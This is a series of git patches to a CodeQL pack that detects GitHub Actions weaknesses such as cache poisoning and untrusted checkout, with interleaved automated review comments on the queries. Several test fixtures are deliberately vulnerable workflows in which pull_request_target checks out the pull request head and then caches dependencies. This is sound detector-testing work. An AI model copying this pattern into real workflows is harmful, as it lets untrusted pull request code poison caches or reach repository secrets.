diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md deleted file mode 100644 index 855773e6a31..00000000000 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md +++ /dev/null 
@@ -1,44 +0,0 @@ -# Unpinned tag for 3rd party Action in workflow - -The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions." - -## Recommendation - -Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. - -## Example - -In this example, the Actions workflow uses an unpinned version. - -```yaml -name: "Unpinned Action Example" - -jobs: - build: - steps: - - name: Checkout repository - uses: actions-third-party-mirror/checkout@v3 - - - run: | - ./build.sh -``` - -The Action is pinned in the example below. 
- -```yaml -name: "Pinned Action Example" - -jobs: - build: - steps: - - name: Checkout repository - uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c - - - run: | - ./build.sh -``` - -## References - -- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) -- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html). diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md deleted file mode 100644 index e69de29bb2d..00000000000 From 2359e2de90d6a7adafca2ec16dfc849e3e0a7fe7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:24:43 +0200 Subject: [PATCH 0233/1267] Clean query --- ql/src/Security/CWE-349/CachePoisoning.ql | 27 +++++++++---------- .../Security/CWE-349/CachePoisoning.expected | 6 ++--- 2 files changed, 16 insertions(+), 17 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index b3a9267703f..ac51e58ff4b 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -15,22 +15,21 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery -from Workflow w, PRHeadCheckoutStep checkout, LocalJob j +from LocalJob j where + // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) // - add push to default branch? // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - w.hasTriggerEvent([ - "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", - "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", - "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", - "watch", "workflow_run" - ]) and - // Workflow is privileged - w.isPrivileged() and - // The workflow checkouts untrusted code from a pull request - j = w.getAJob() and - j.getAStep() = checkout and - // The checkout step is followed by a cache writing step + j.getEnclosingWorkflow() + .hasTriggerEvent([ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", + "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card", + "project_column", "public", "pull_request_comment", "pull_request_target", + "repository_dispatch", "schedule", "watch", "workflow_run" + ]) and + // The job checkouts untrusted code from a pull request + j.getAStep() instanceof PRHeadCheckoutStep and + // The job writes to the cache j.getAStep() instanceof CacheWritingStep -select checkout, "Potential cache poisoning on privileged workflow." +select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index e767e2f8622..b791a440a6e 100644 
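Review bot: The alert text on the `select` line still reads "on privileged workflow" although this hunk removes the `w.isPrivileged()` condition, so the message now claims something the query no longer checks. Wording that follows the new comment would be more accurate, e.g. `select j.getAStep().(CacheWritingStep), "Potential cache poisoning in the context of the default branch."`, with the `.expected` file updated to match. The new `where` clause still does not relate the checkout to the cache-writing step beyond both being in job `j`; a short comment saying that order is intentionally not checked would prevent a later reader from assuming it is.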
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,3 +1,3 @@ -| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | From f6b1daa59c7e872797c1486486258d23c7a3f2db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:26:58 +0200 Subject: [PATCH 0234/1267] Improve query --- .../actions/security/CachePoisoningQuery.qll | 11 +++++++++-- ql/src/Security/CWE-349/CachePoisoning.ql | 16 ++++++++++++---- .../CWE-349/.github/workflows/test5.yml | 17 +++++++++++++++++ .../CWE-349/.github/workflows/test6.yml | 17 +++++++++++++++++ .../CWE-349/.github/workflows/test7.yml | 16 ++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 ++ 6 files changed, 73 insertions(+), 6 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index a9a28227957..6668ef9777d 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -21,7 +21,14 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep { } class SetupGoUsesStep extends CacheWritingStep, UsesStep { - SetupGoUsesStep() { this.getCallee() = "actions/setup-go" } + SetupGoUsesStep() { + this.getCallee() = "actions/setup-go" and + ( + not exists(this.getArgument("cache")) + or + this.getArgument("cache") = "true" + ) + } } class SetupNodeUsesStep extends CacheWritingStep, UsesStep { @@ -48,7 +55,7 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { SetupDotnetUsesStep() { this.getCallee() = "actions/setup-dotnet" and ( - exists(this.getArgument("cache")) or + this.getArgument("cache") = "true" or exists(this.getArgument("cache-dependency-path")) ) } diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index ac51e58ff4b..e0d59a02ab4 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -14,8 +14,9 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps -from LocalJob j +from LocalJob j, PRHeadCheckoutStep checkout where // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) 
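Review bot: In `SetupGoUsesStep` the comparison `this.getArgument("cache") = "true"` is an exact string match, so a step that sets `cache` to `True`, `TRUE` or an expression such as `${{ inputs.cache }}` is no longer treated as a cache writer and its job drops out of the cache-poisoning results. Since the `not exists(...)` branch already encodes that caching is on unless it is switched off, a detection query is safer excluding only the explicit opt-out: `this.getCallee() = "actions/setup-go" and not this.getArgument("cache").toLowerCase() = "false"`. The same exact match is introduced for `SetupDotnetUsesStep` in the next hunk, where `this.getArgument("cache").toLowerCase() = "true"` would at least cover the casing variants. `SetupDotnetUsesStep` starts outside its hunk.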
@@ -29,7 +30,14 @@ where "repository_dispatch", "schedule", "watch", "workflow_run" ]) and // The job checkouts untrusted code from a pull request - j.getAStep() instanceof PRHeadCheckoutStep and - // The job writes to the cache - j.getAStep() instanceof CacheWritingStep + j.getAStep() = checkout and + ( + // The job writes to the cache + // (No need to follow the checkout step as the cache writing is normally done after the job completes) + j.getAStep() instanceof CacheWritingStep + or + // The job executes checked-out code + // (The cache specific token can be leaked even for non-privileged workflows) + checkout.getAFollowingStep() instanceof PoisonableStep + ) select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml new file mode 100644 index 00000000000..9bc6cc98056 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + cache: false + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml new file mode 100644 index 00000000000..b5ef835210b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + cache: true + - run: do some go stuff + 
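Review bot: The new `checkout.getAFollowingStep() instanceof PoisonableStep` disjunct cannot add any result, because the unchanged `select j.getAStep().(CacheWritingStep)` only yields rows for jobs that contain a cache-writing step, and for those jobs the first disjunct already holds. A job that checks out the pull request head and then runs the checked-out code without a caching action is therefore still not reported, which appears to be the case the added comment about the cache token is meant to cover. Binding the reported step to a variable in `from` and selecting it would fix this, e.g. `j.getAStep() = step and (step instanceof CacheWritingStep or step = checkout.getAFollowingStep().(PoisonableStep))` with `select step, ...`. The message also still says "privileged workflow" while the added comment says non-privileged workflows are affected. The `from` clause is in the previous hunk of this file.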
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml new file mode 100644 index 00000000000..d0ff8c180fe --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml @@ -0,0 +1,16 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index b791a440a6e..6e0030ad383 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,3 +1,5 @@ | .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | | .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | | .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. | From 373e0a278af4bbe7551a271ded09c6e72705ac62 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:36:46 +0200 Subject: [PATCH 0235/1267] Rename untrusted checkout queries --- ...dCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} | 2 +- ...tedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) rename ql/src/Security/CWE-829/{UntrustedCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} (95%) rename ql/src/Security/CWE-829/{UntrustedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} (95%) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql similarity index 95% rename from ql/src/Security/CWE-829/UntrustedCheckoutError.ql rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql index 604acf71cc7..5c0528c4551 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql @@ -7,7 +7,7 @@ * @problem.severity error * @precision high * @security-severity 9.3 - * @id actions/untrusted-checkout + * @id actions/privileged-untrusted-checkout/critical * @tags actions * security * external/cwe/cwe-829 diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql similarity index 95% rename from ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql index d8dfd69ad28..e45075552ab 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql @@ -7,7 +7,7 @@ * @problem.severity warning * @precision medium * @security-severity 5.3 - * @id actions/untrusted-checkout + * @id actions/privileged-untrusted-checkout/high * @tags actions * security * external/cwe/cwe-829 From 254664d2747daf4fc1910b33c5cd3cdf2b8627cf Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:39:15 +0200 Subject: [PATCH 0236/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 380cfdbd858..f07d6c40046 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.20 +version: 0.0.21 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c5a94e35d4b..13f053a40da 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.20 +version: 0.0.21 groups: - actions - queries From c3c6410a73033d86e2ede33a3cec958d19f29609 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 20:01:48 +0200 Subject: [PATCH 0237/1267] Update action.yml --- .github/action/dist/index.js | 11 +++-------- .github/action/src/codeql.ts | 13 +++---------- action.yml | 14 +++----------- 3 files changed, 9 insertions(+), 29 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 4a60299ef0f..0911555e292 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
@@ -28706,14 +28706,9 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; - const extPackPath = process.env["EXTPACK_PATH"]; - const extPackName = process.env["EXTPACK_NAME"]; - if (extPackPath !== undefined && - extPackName !== undefined && - extPackPath !== "" && - extPackName !== "") { - cmd.push("--additional-packs", extPackPath); - cmd.push("--extension-packs", extPackName); + const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; + if (useWorkflowModels !== undefined && useWorkflowModels == "true") { + cmd.push("--extension-packs", "local/workflow-models"); } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 842af1c8b17..ea1d731c935 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -147,16 +147,9 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; - const extPackPath = process.env["EXTPACK_PATH"]; - const extPackName = process.env["EXTPACK_NAME"]; - if ( - extPackPath !== undefined && - extPackName !== undefined && - extPackPath !== "" && - extPackName !== "" - ) { - cmd.push("--additional-packs", extPackPath); - cmd.push("--extension-packs", extPackName); + const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; + if (useWorkflowModels !== undefined && useWorkflowModels == "true") { + cmd.push("--extension-packs", "local/workflow-models"); } // remote pack or local pack diff --git a/action.yml b/action.yml index 35c423e103d..24453e893ee 100644 --- a/action.yml +++ b/action.yml @@ -14,12 +14,6 @@ inputs: suite: description: "CodeQL Suite to run" default: "actions-code-scanning" - workflow-extpack-path: - description: "Path to Workflow extpack" - required: false - workflow-extpack-name: - description: "Name of the Workflow extpack" - required: false runs: using: 'composite' 
@@ -27,14 +21,14 @@ runs: - name: extpack contents shell: bash env: - EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} - EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} + EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 + EXTPACK_NAME: local/workflow-models run: | echo "##[group] Workflow Models" if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi + if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi echo "##[endgroup]" - name: Scan workflows @@ -45,7 +39,5 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} - EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 0ea34dfb528c914602c8cdf2adc35768a725a786 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 22:11:43 +0200 Subject: [PATCH 0238/1267] Update action.yml --- action.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 24453e893ee..151c909fb8b 100644 --- a/action.yml +++ b/action.yml 
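Review bot: The `extpack contents` step now hard-codes `EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1`, which only exists for a runner user whose home is `/home/runner` and for pack version 0.0.1; anywhere else both `[ -f ... ]` tests fail silently and `USE_WORKFLOW_MODELS` is never set, so the extension pack is skipped without any log line. The variable is also expanded unquoted in the `run` script; prefer `if [ -f "$EXTPACK_PATH/codeql-pack.yml" ]; then cat "$EXTPACK_PATH/codeql-pack.yml"; ...`. Writing `USE_WORKFLOW_MODELS=true` to `$GITHUB_ENV` from a composite action makes the variable visible to every later step of the calling job, not only to the scan step; a step output read in the scan step's `env:` would keep it scoped. The `steps:` list starts above this hunk.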
@@ -14,12 +14,19 @@ inputs: suite: description: "CodeQL Suite to run" default: "actions-code-scanning" + packs: + description: >- + Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not + specified, then the latest version of the pack is used. By default, this overrides the same setting in a + configuration file; prefix with "+" to use both sets of packs. + required: false runs: using: 'composite' steps: - name: extpack contents shell: bash + if: inputs.packs env: EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 EXTPACK_NAME: local/workflow-models @@ -28,7 +35,7 @@ runs: if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi + if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi echo "##[endgroup]" - name: Scan workflows @@ -39,5 +46,6 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} + INPUT_PACKS: ${{ inputs.packs }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 1ddfbb05f36adcb32f4415a9a7b9a145edfe2094 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 22:19:02 +0200 Subject: [PATCH 0239/1267] Update actions fragment --- .github/action/dist/index.js | 6 +++--- .github/action/src/codeql.ts | 9 ++++++--- 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 0911555e292..8ff1e7759d2 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
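Review bot: The description of the new `packs` input reads like one for query packs ("packs to run", a "+" prefix to merge with a configuration file), while the next commit on this page forwards the value unchanged to `--extension-packs`. A description that states what the value is used for would avoid misleading callers, e.g. `description: "Extension packs to load during analysis, in the format scope/name[@version]"`. The `if: inputs.packs` guard added to the `extpack contents` step is only loosely related to what the step does: it still prints files from the fixed `local/workflow-models/0.0.1` path whichever packs are named in the input.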
@@ -28610,6 +28610,7 @@ async function newCodeQL() { suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), + packs: core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, }; } exports.newCodeQL = newCodeQL; @@ -28706,9 +28707,8 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; - const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; - if (useWorkflowModels !== undefined && useWorkflowModels == "true") { - cmd.push("--extension-packs", "local/workflow-models"); + if (codeql.packs !== undefined) { + cmd.push("--extension-packs", codeql.packs); } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index ea1d731c935..76eacd6eb67 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -18,6 +18,8 @@ export interface CodeQLConfig { source_root?: string; // The output file for the SARIF file. output?: string; + // Extension CodeQL packs to use for analysis. + packs: string | undefined; } export async function newCodeQL(): Promise { @@ -28,6 +30,8 @@ export async function newCodeQL(): Promise { suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), + packs: + core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, }; } @@ -147,9 +151,8 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; - const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; - if (useWorkflowModels !== undefined && useWorkflowModels == "true") { - cmd.push("--extension-packs", "local/workflow-models"); + if (codeql.packs !== undefined) { + cmd.push("--extension-packs", codeql.packs); } // remote pack or local pack 
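Review bot: In `codeql.ts`, `packs: string | undefined` makes the new field mandatory in every `CodeQLConfig` literal, unlike the neighbouring `source_root?: string` and `output?: string`; `packs?: string` expresses the same thing and matches the interface's style. In `newCodeQL`, `core.getInput("packs")` is read twice; `packs: core.getInput("packs") || undefined` is equivalent and shorter. In `codeqlDatabaseAnalyze` the string is pushed to `--extension-packs` verbatim, so the field comment should say which separators are accepted, since the action input advertises a comma-separated list. The interface, `newCodeQL` and `codeqlDatabaseAnalyze` all continue outside their hunks.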
From ddf4bb194ef1562a45ad17d5a1066f88021f23c3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 23:32:06 +0200 Subject: [PATCH 0240/1267] Fix incorrect source for dorny path filters --- .../codeql/actions/dataflow/FlowSources.qll | 17 ++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 20 ++++++ ql/lib/ext/dorny_paths-filter.model.yml | 6 -- ql/test/library-tests/test.expected | 1 - .../CWE-094/.github/workflows/test2.yml | 64 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 ++ .../CWE-094/PrivilegedCodeInjection.expected | 8 +++ 7 files changed, 114 insertions(+), 8 deletions(-) delete mode 100644 ql/lib/ext/dorny_paths-filter.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 580fb1d25ab..db111b9e190 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -252,10 +252,25 @@ class CompositeActionInputSource extends RemoteFlowSource { } /** - * A downloadeded artifact. + * A downloaded artifact. */ private class ArtifactSource extends RemoteFlowSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } } + +/** + * A list of file names returned by dorny/paths-filter. + */ +private class DornyPathsFilterSource extends RemoteFlowSource { + DornyPathsFilterSource() { + exists(UsesStep u | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index b24f9484a80..32c329d8c67 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
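Review bot: `DornyPathsFilterSource` is documented as "A list of file names returned by dorny/paths-filter", but the class only matches steps whose `list-files` argument is `csv` or `json`, and it marks the whole `UsesStep` as the source rather than a particular output. The doc comment should say so, e.g. `/** A dorny/paths-filter step with list-files set to csv or json, whose *_files outputs carry changed file names; the shell and escape formats are not modelled. */`. A short reason for leaving out `shell` and `escape` (presumably because the action quotes those formats) would save the next reader from checking the action's source.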
@@ -124,3 +124,23 @@ class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { artifactDownloadToUseStep(node1, node2) } } + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesStep u, StepsExpression o | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + u = pred.asExpr() and + o.getStepId() = u.getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +class DornyPathsFilterTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) + } +} diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml deleted file mode 100644 index 79621a6a30c..00000000000 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 5bd009b31b0..d7f944c5a3d 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -438,7 +438,6 @@ sources | amannn/action-semantic-pull-request | * | output.error_message | text | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | -| dorny/paths-filter | * | output.changes | filename | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | 
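Review bot: In `dornyPathsFilterTaintStep`, `o.getFieldName().matches("%_files")` uses a LIKE-style pattern in which `_` matches any single character, so the step also fires for an output whose name merely ends in `files` preceded by one arbitrary character. A filter named `myfiles` would qualify, and as far as I know that output is the filter's match flag rather than a file list, which would give a false positive. Escape the underscore, `o.getFieldName().matches("%\\_files")`, or use `o.getFieldName().regexpMatch(".*_files")`.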
